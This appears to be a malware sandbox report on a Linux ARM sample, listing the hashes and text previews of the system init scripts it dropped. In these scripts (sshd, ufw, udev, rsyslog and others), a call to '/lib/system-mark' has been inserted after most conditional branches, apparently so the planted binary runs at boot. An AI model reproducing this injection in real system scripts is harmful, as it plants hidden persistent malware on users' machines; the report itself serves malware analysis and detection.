                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON || exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system-mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system-mark.for slave in slaves/*;.do..if [ "$slave" = "slaves/*" ]; then./lib/system-mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath | sed -n "s/\(.*\): .* $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system-mark....log_daemon_msg "Root is on a multipathed device, multipathd c
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2589
                                                                          Entropy (8bit):5.112756814918559
                                                                          Encrypted:false
                                                                          SSDEEP:48:7UMRMrEm3cy8Nc8NgZlfMMtWBAl3ATeTPAdWIlRdWdtRMg02AC9ArANTcAhicF:7b2rH338azZlfn/lwA4dWIhC8DUbL
                                                                          MD5:207481F279E4D4E87E2455C16287C685
                                                                          SHA1:1CC3B8B32EE2BCD5342F38B66C936C4EC18897F4
                                                                          SHA-256:225B755072D5C433DE74DE26633834FF05A6956053557F1B3F634AE08752C6BF
                                                                          SHA-512:E494C2A33928070E2E1BACA3AE53814986AC7C9CEB3B4D31CAE0C0202AC2BEE98CF65A196387FAA7EED560B6AC6665EE6D3C77630167ADFDBF82C99FE3F65B14
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] || exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system-mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system-mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] || ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1881
                                                                          Entropy (8bit):4.863837327437562
                                                                          Encrypted:false
                                                                          SSDEEP:48:1a/f0aOHh86/X/QA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB86j4e8j8Q8Ml8OmooG2D3k
                                                                          MD5:CE0C8A7E1042C39FB28FEE6981E2ACE4
                                                                          SHA1:C7B193DB855B637F7011A28928DE2E0A5796B825
                                                                          SHA-256:32735889841F4B203B9C06278D9A178D08AF5288474F475A31F0AC2669C1DD56
                                                                          SHA-512:1B676B9B1CB75C48D5B4EE6D34E402A6B99C4CECA8B261177396C13E63323A5C6A9F62B556FFAB110C25B9066D4253E9C0ACB1D3DA790ECD70426DD9A0AA46C1
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system-mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} | grep -iq vmware; then./lib/system-mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null || exit 1.
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1401
                                                                          Entropy (8bit):5.3052027136710675
                                                                          Encrypted:false
                                                                          SSDEEP:24:1sqE3A2EYVwMwRwDTMBgV2APfcVwAPYIpPgfS+VGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzQAsVwAgGYfdVz58Y9f5v
                                                                          MD5:2B23E2A5868129F5B68D4465E1FBA27A
                                                                          SHA1:8781CE140244ABA8178CCC20B50AB3C252D82A1F
                                                                          SHA-256:5D49F02BB6C8C031EA02F67ABFB812EB75425058AD30F44FAB85A9463D2DB1CC
                                                                          SHA-512:8DBA742FB4B66C0799E66FA5E070161E2EDBA95A0789A06F51910D659F51E6313D32072078A44B7D2A46CD18B63036F07FBFBD8AEF90843643860424FED398D4
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd || exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash*)....SPLASH="true"....;;....nosplash*|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system-mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):787
                                                                          Entropy (8bit):5.274418902272115
                                                                          Encrypted:false
                                                                          SSDEEP:12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCR6D02ygvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgTHygvR4MLoVS
                                                                          MD5:92B74D7357C759DB635940F9DBE7A5E8
                                                                          SHA1:88C813B379F01849C7A709BF47D8C40AB2A25345
                                                                          SHA-256:DBDAB3736BE330D3CC39A75E100F6FB8D9094413A7D24CAC22A8BE39DE25D3C3
                                                                          SHA-512:405A8103CE19E154E58A9B0D26C888807F1DE5B3A98EF8C66DF31F3113542215004FD4CD9783C021ED27FEC165B4605CF6B92C141AD9E2BE4872C1D80A34B6E7
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth || exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system-mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop|restart|force-reload)....;;...*)...echo "Usage: ${0} {start|stop|restart|force-reload}" >&2...exit 1...;;.esac..exit 0..
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):942
                                                                          Entropy (8bit):5.25253518776668
                                                                          Encrypted:false
                                                                          SSDEEP:12:atdRDNeBuYrBMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLEx/25+Z+nMfTWTeCKa3VfhL69z0
                                                                          MD5:BEA2BDFD5F7688D4F6E313DC63CA499D
                                                                          SHA1:4D6764F461EE096E83A5F5923ED8472A94526E95
                                                                          SHA-256:8D2D9E87F61D6D84EFF365927CB97A21EBFC3C9B9BDA48D13858D285AD332466
                                                                          SHA-512:932B314974F2AA88FC3E1292729F166EC1459B2951F476F9E9CFA00AC0A36B0687C3CC1BED94B968BBAAF47C3D679CFBE152DFE984E54306800FB85A16DE0F3D
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system || STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):4639
                                                                          Entropy (8bit):5.249855326047257
                                                                          Encrypted:false
                                                                          SSDEEP:96:jdRMpo498RXFzyb1U0lKRuHp8gXGHoNURkx:jdRMpJ98g1U0c8JxWINUmx
                                                                          MD5:BBBAC3DC084FCC76813396852B0383FE
                                                                          SHA1:675F156F5AAF3BFA73C23A1478680F9769D19926
                                                                          SHA-256:BF77774A109F072532F634BCC63FB7DA005BEB0D553418FA42DED906F3025EFF
                                                                          SHA-512:C7F9AE322C14643F6D711B4B20AD009522B3FE02E986CFB5F839717144BF795E70E17A2745D24E74C4CA76922FF8ED0C1D413F7CEBDECA25CFC52AE4EDE04FA7
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON || exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system-mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2899
                                                                          Entropy (8bit):5.275562121366292
                                                                          Encrypted:false
                                                                          SSDEEP:48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ie3nLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ie3nR5JT
                                                                          MD5:5D640A7C6908172899411BF2B8B1DE9C
                                                                          SHA1:B3980052CC12A5ACF1DD34D134CD822CAE09C63A
                                                                          SHA-256:A40550FEDDF8DB933722514358F364F7CCD50E9EFF123F4F408575BFB0865DE2
                                                                          SHA-512:E0AAF4ACC9F2707B6B191A5BDB36711F43D5C1890D5FFD614C03C2525E31F7993BE0308B865DA41B6D4E83A32759AEE91D8B94C293AD6174C2D94633980B3766
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] || exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2293
                                                                          Entropy (8bit):5.0050970590485715
                                                                          Encrypted:false
                                                                          SSDEEP:24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHvdNw5G/9yNuFimjBklJJq5MxnR5/2F:e7Y0u/i5t7RbHwG/9diHlrXnL/iOs1
                                                                          MD5:E26E346029E7C03BC1EF969368CF6A1D
                                                                          SHA1:7AD4BCFDA2907E9EED7C2DC81820EABFC0132AE7
                                                                          SHA-256:B26A28FBDDDCA0E1A9232CF7719860044CB58D34E11AEDC1D53C9D57A689616A
                                                                          SHA-512:FBAF8DA2CA6CA008E3D3F1F93C6FAF794A0D62ECD161770F0D00A48697AC190BAB80A13EA1B2D18A4CFD35FA33BEB8891848D5DA67D1DAD2246995CD44B45910
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON || exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system-mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1274
                                                                          Entropy (8bit):5.007351824676895
                                                                          Encrypted:false
                                                                          SSDEEP:24:c26Nr+XEgBYxABoO21p4rqeYCRjeyvcsTN/RGT7d/LGld/7K9jp:cPQoO23+qeYSjeybRRGHdTGld/7K9jp
                                                                          MD5:2CB1D1EE81FD07E07C103CB77A254958
                                                                          SHA1:1B94DFA21FF802A7176767B4F0B5EEC16057B5EC
                                                                          SHA-256:6DEA1801FFE07EB969A54FA572A6A63C80D570CEABAC7F14BFD51DD40E67FD30
                                                                          SHA-512:48556EE1B364DA2B128006C2755F1C665559C2216ECA1CE06D7972A158CD27AB075859ABD842D7C2F118175A5616B6FE5B6288866A55B050A465E699EB67C491
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen || exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR || ! test -d $SCREENDIR; then./lib/system-mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2519
                                                                          Entropy (8bit):4.741374235420371
                                                                          Encrypted:false
                                                                          SSDEEP:48:DFZazGMU+rI4CXyUH0I6zroGW//AhrHoGx//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGWQRHoGxQuiIngczVII
                                                                          MD5:652E57DD61B8A64F80D9CCCD751E4476
                                                                          SHA1:1C9E3D8CBCD6F9E6B1B3994D8246C89A52BA84CE
                                                                          SHA-256:49FEFA6609A75C4A3624B556F2593A15B2F9E0C173BFB2233B90DBC8BF52E53D
                                                                          SHA-512:657C725D48D6A56929530EC68DB98895C4EB7F3A6C94E799FBA2BF48053883F8128C03F934A63E623340FD0433FE5222685CAC501D5C8D9B81317353649E382D
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):4195
                                                                          Entropy (8bit):5.068394475077908
                                                                          Encrypted:false
                                                                          SSDEEP:96:jkXSV2xsYJrvcRyAHofonXHeyKyWUkO8IhQ:j1ouYJDc7IQXoXBIhQ
                                                                          MD5:C7F75670C4CBACFFCD3EE308F9EC9F4A
                                                                          SHA1:4D77E8C62706CB0601CB8031FB0368581E479792
                                                                          SHA-256:7E40FB227308DFE02D3F2EDF82B41D0FDF729A942D78D74C72EEA7A82669BE90
                                                                          SHA-512:39EB8A235611E0B6EC4C15D5C7D86274573A0C9DFD69E31D1297F50B992B0FF247382E20DAF02133BC7896B0530C215B5A1F870A6F214C9AF0DDB1F70C213CEA
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd || exit 0.( /usr/sbin/sshd -\? 2>&1 | grep -q OpenSSH ) 2>/dev/null || exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system-mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system-mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) || [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system-mark..if [ "$1" = log_end_msg ]; then./lib/system-mark.. log_end_msg 0 || true..fi..if ! run_by_init; then./lib/syst
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):7281
                                                                          Entropy (8bit):4.982014475224516
                                                                          Encrypted:false
                                                                          SSDEEP:96:l7vIwGhwBoNNqeI4OyxwfPlBALWGGgRoG2davbKBJKCrrS2DvwvPmWGPmTbKBJKk:lOWoYiOVlz2B2daxqrS2zwGW51Wymj
                                                                          MD5:9C101DF581AD6E404FB99F3B974E743E
                                                                          SHA1:CF4A059360FEDD5F371C815772E2BAFC4532E997
                                                                          SHA-256:63F0156061B5B581C069F51ED8E3B0473CF796EA88A3BF4BE92B420D529B59AB
                                                                          SHA-512:4F7658321F7AC02F9D528088E8A572B8F8549C8FCC61366BDC43ACB61C9C216EBF597D78116A5DB4A42BDC0DC17A4AF6B55C068DB41BDC2DC661900B70A3EDE2
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system-mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system-mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system-mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2220
                                                                          Entropy (8bit):4.757250053076253
                                                                          Encrypted:false
                                                                          SSDEEP:48:1LleiFcd/nzngwPatTM/JrNWwj/Jb/SX9l:1BDFmXOQvJE
                                                                          MD5:EA501062EF1DD3FA29A5BC5479E85D5C
                                                                          SHA1:997CD2C9A15D23589A8862E2F521A6E40C807311
                                                                          SHA-256:90D6965642D81F9AF96BA403FA262381940E73011724178E6B72EC54955C0BCB
                                                                          SHA-512:95D16F0A742BA49AA8ABEA1F448F602B4F00ED3DBDD51B25E71C79A68B9F07926B252A9B66D1BFFB760247BD4C605CCD9B4ACCF3ED1D1755A7886651AC6C396D
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] || exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system-mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] || [ "$ENABLED" = "YES" ]; then./lib/system-mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` || error="$?". if [ "$error" = "0" ]; then./lib/system-mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system-mark. echo "$output" | while read
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1426
                                                                          Entropy (8bit):5.323775798950294
                                                                          Encrypted:false
                                                                          SSDEEP:24:aMXni+12wpFKFOGofwvlf/HNVKowwflHBhF/7Px1gr:bni23FKFpbt3GnoHBDbx2
                                                                          MD5:0BAD7D02A34912B684C93C71BFD19757
                                                                          SHA1:688CF612860E3C7125D34B63F7EF584DC65E4550
                                                                          SHA-256:FF796642243AF8B1492D63FF16F761AE942A4AE7CCFA17A05E3CF533B0D6E4DB
                                                                          SHA-512:D806A1D5B8AD9AA0A51841825DA8ACD4DA299D331874CD6FD777BCD6802B8BC7498B118B6D85F7E1793749EDCD3ABBD57EA78620226D34E43DA3AE1EE73BA684
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system-mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1358
                                                                          Entropy (8bit):5.209136415739334
                                                                          Encrypted:false
                                                                          SSDEEP:24:aNmC4ozLk8BZa8LNfwa0aDEPLu5CB5ZM5AHdwi/mqT0KtOC:3VozBjdh0a4PLuIBvMGwitIKtl
                                                                          MD5:A18F61759309F7DAE1CF4D379B0DC2E0
                                                                          SHA1:38BB4BFF894D6973BC2B59145A28CD93FC2A2B26
                                                                          SHA-256:8750FAACA2F9E6ED50996EBA4C23F884241C27A375CCFE79801715044BEA7232
                                                                          SHA-512:18489A3A5A446A80D1EEB324AD9823480FF2C53AF1703D4DB6B3DE42A7901B0223135948FD5162F60418F1AB7B7AA1CB3D3CA5C7D1E9E05F6048204DD913D6FB
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON || exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system-mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2911
                                                                          Entropy (8bit):4.894244496059908
                                                                          Encrypted:false
                                                                          SSDEEP:48:ZETewCRgFkV5ZSVwxcRypF1vrBy9DuIpPX5uCXAepm1L3/WAhyC76XGMgH3:SggFkViVNePT09DuYX5HX3aLdqX8
                                                                          MD5:E39C2FE947515C58470F91A5A6D1ED5B
                                                                          SHA1:00C7881A33ED0425C236C9544BD43E7BC9AE46DD
                                                                          SHA-256:37CCB9BB9C51FEB17B9943BB7DF42E8E03342F5611EC649E5C6E5A87A5A2840D
                                                                          SHA-512:AB26218676CEA2C319F29911650AA98C2E7D5578E9E2130D44997FDDE2E59765E1AAC52E0EE2C466E231B55AFFCA92B9C0A67A8381725D5433C3392DE04FF7F3
                                                                          Malicious:true
